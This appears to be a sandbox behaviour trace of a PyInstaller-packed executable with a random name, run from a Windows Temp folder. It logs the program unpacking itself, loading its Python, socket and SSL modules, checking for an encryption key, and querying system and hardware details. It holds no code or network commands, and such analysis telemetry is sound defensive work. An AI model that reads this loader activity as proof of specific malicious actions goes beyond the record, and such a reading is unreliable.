File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 512, size_out = 96 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 1024, size_out = 1024 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 512, size_out = 408 True 1
Fn
Data
File Add Search Path filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CreateActCtxW, address_out = 0x76955d0f True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = ActivateActCtx, address_out = 0x76955911 True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, base_address = 0x6a9b0000 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetCurrentActCtx, address_out = 0x7694bf9d True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = ActivateActCtx, address_out = 0x76955911 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = DeactivateActCtx, address_out = 0x76955942 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = AddRefActCtx, address_out = 0x7694bffb True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = ReleaseActCtx, address_out = 0x76957347 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_DontWriteBytecodeFlag, address_out = 0x6ac2f250 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_FileSystemDefaultEncoding, address_out = 0x6abd2c6c True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_FrozenFlag, address_out = 0x6ac2f248 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_IgnoreEnvironmentFlag, address_out = 0x6ac2f234 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_NoSiteFlag, address_out = 0x6ac2f244 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_NoUserSiteDirectory, address_out = 0x6ac2ef68 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_OptimizeFlag, address_out = 0x6ac2ef0c True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_VerboseFlag, address_out = 0x6ac2f230 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_BuildValue, address_out = 0x6aadbdb0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_DecRef, address_out = 0x6aa73470 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_Finalize, address_out = 0x6aaec1d0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_IncRef, address_out = 0x6aa73460 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_Initialize, address_out = 0x6aaec1c0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_SetProgramName, address_out = 0x6aaec4f0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = Py_SetPythonHome, address_out = 0x6aaec520 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyDict_GetItemString, address_out = 0x6aa55330 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyErr_Clear, address_out = 0x6aacd780 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyErr_Occurred, address_out = 0x6aacd330 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyErr_Print, address_out = 0x6aaecfb0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyImport_AddModule, address_out = 0x6aad4770 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyImport_ExecCodeModule, address_out = 0x6aad4850 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyImport_ImportModule, address_out = 0x6aad6550 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyList_Append, address_out = 0x6aa67500 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyList_New, address_out = 0x6aa670e0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyLong_AsLong, address_out = 0x6aa6b5d0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyModule_GetDict, address_out = 0x6aa72f30 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyObject_CallFunction, address_out = 0x6aa3d580 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyObject_SetAttrString, address_out = 0x6aa74630 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyRun_SimpleString, address_out = 0x6aaee9a0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyString_FromString, address_out = 0x6aa7a820 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyString_FromFormat, address_out = 0x6aa7b080 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PySys_AddWarnOption, address_out = 0x6aaf33e0 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PySys_SetArgvEx, address_out = 0x6aaf4140 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PySys_GetObject, address_out = 0x6aaf2440 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PySys_SetObject, address_out = 0x6aaf2500 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PySys_SetPath, address_out = 0x6aaf4060 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyEval_EvalCode, address_out = 0x6aabbd80 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, function = PyMarshal_ReadObjectFromString, address_out = 0x6aada980 True 1
Fn
Module Get Filename module_name = c:\users\eebsym5\appdata\local\temp\_mei29802\python27.dll, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, size = 256 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 256 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Python\PythonCore\2.7\PythonPath False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Python\PythonCore\2.7\PythonPath False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4, size_out = 4 True 4
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 17308, size_out = 17307 True 1
Fn
Data
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Python\PythonCore\2.7\Modules\pyimod00_crypto_key False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Python\PythonCore\2.7\Modules\pyimod00_crypto_key False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pyimod00_crypto_key, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pyimod00_crypto_key.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pyimod00_crypto_key.py, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pyimod00_crypto_key.pyw, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\pyimod00_crypto_key.pyc, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE?4045510, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 8304, size_out = 8304 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5695, size_out = 5695 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 950, size_out = 950 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1405, size_out = 1405 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5838, size_out = 5838 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1679, size_out = 1679 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1232, size_out = 1232 True 1
Fn
Data
System Get Info type = Operating System True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2980, size_out = 2980 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 7452, size_out = 7452 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2528, size_out = 2528 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2508, size_out = 2508 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2369, size_out = 2369 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2112, size_out = 2112 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 10519, size_out = 10519 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 3084, size_out = 3084 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 6930, size_out = 6930 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_ctypes.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_ctypes.pyd, base_address = 0x6ee80000 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\_ctypes.pyd, function = init_ctypes, address_out = 0x6ee87900 True 1
Fn
Module Load module_name = kernel32, base_address = 0x76910000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x7695bf00 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1042, size_out = 1042 True 1
Fn
Data
System Get Info type = Hardware Information True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\eggs, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 8711, size_out = 8711 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 3498, size_out = 3498 True 1
Fn
Data
File Get Info filename = C:\Windows\system32\uuid, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\system32\uuid.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\uuid, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\uuid.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\System32\Wbem\uuid, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\System32\Wbem\uuid.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\uuid, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\System32\WindowsPowerShell\v1.0\uuid.dll, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\rpcrt4, type = file_attributes False 1
Fn
Module Load module_name = rpcrt4, base_address = 0x75680000 True 1
Fn
Module Get Address module_name = c:\windows\system32\rpcrt4.dll, function = UuidCreate, address_out = 0x756a6483 True 1
Fn
Module Get Address module_name = c:\windows\system32\rpcrt4.dll, function = UuidCreateSequential, address_out = 0x7569b8b0 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 7006, size_out = 7006 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_socket.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_socket.pyd, base_address = 0x6e720000 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\_socket.pyd, function = init_socket, address_out = 0x6e725790 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1810, size_out = 1810 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_ssl.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_ssl.pyd, base_address = 0x6b350000 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\_ssl.pyd, function = init_ssl, address_out = 0x6b356600 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 6021, size_out = 6021 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5151, size_out = 5151 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5480, size_out = 5480 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 8274, size_out = 8274 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 2699, size_out = 2699 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 9252, size_out = 9252 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1181, size_out = 1181 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 5906, size_out = 5906 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 14670, size_out = 14670 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 3385, size_out = 3385 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 7428, size_out = 7428 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1693, size_out = 1693 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 10202, size_out = 10202 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1746, size_out = 1746 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 3203, size_out = 3203 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_hashlib.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
Module Load module_name = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\_hashlib.pyd, base_address = 0x6a8b0000 True 1
Fn
Module Get Address module_name = c:\users\eebsym5\appdata\local\temp\_mei29~1\_hashlib.pyd, function = init_hashlib, address_out = 0x6a8b2200 True 1
Fn
Module Get Handle module_name = c:\windows\system32\advapi32.dll, base_address = 0x769f0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextA, address_out = 0x769f91dd True 1
Fn
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = CryptGenRandom, address_out = 0x769fdfc8 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Python\PythonCore\2.7\Modules\fcntl False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Python\PythonCore\2.7\Modules\fcntl False 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\fcntl, type = file_attributes False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\fcntl.pyd, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\fcntl.py, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\fcntl.pyw, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29~1\fcntl.pyc, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 12277, size_out = 12277 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 12852, size_out = 12852 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 4924, size_out = 4924 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 6800, size_out = 6800 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, size = 1806, size_out = 1806 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\VKVMTN~1.EXE, file_attributes = _O_RDONLY | _O_BINARY True 1
Fn
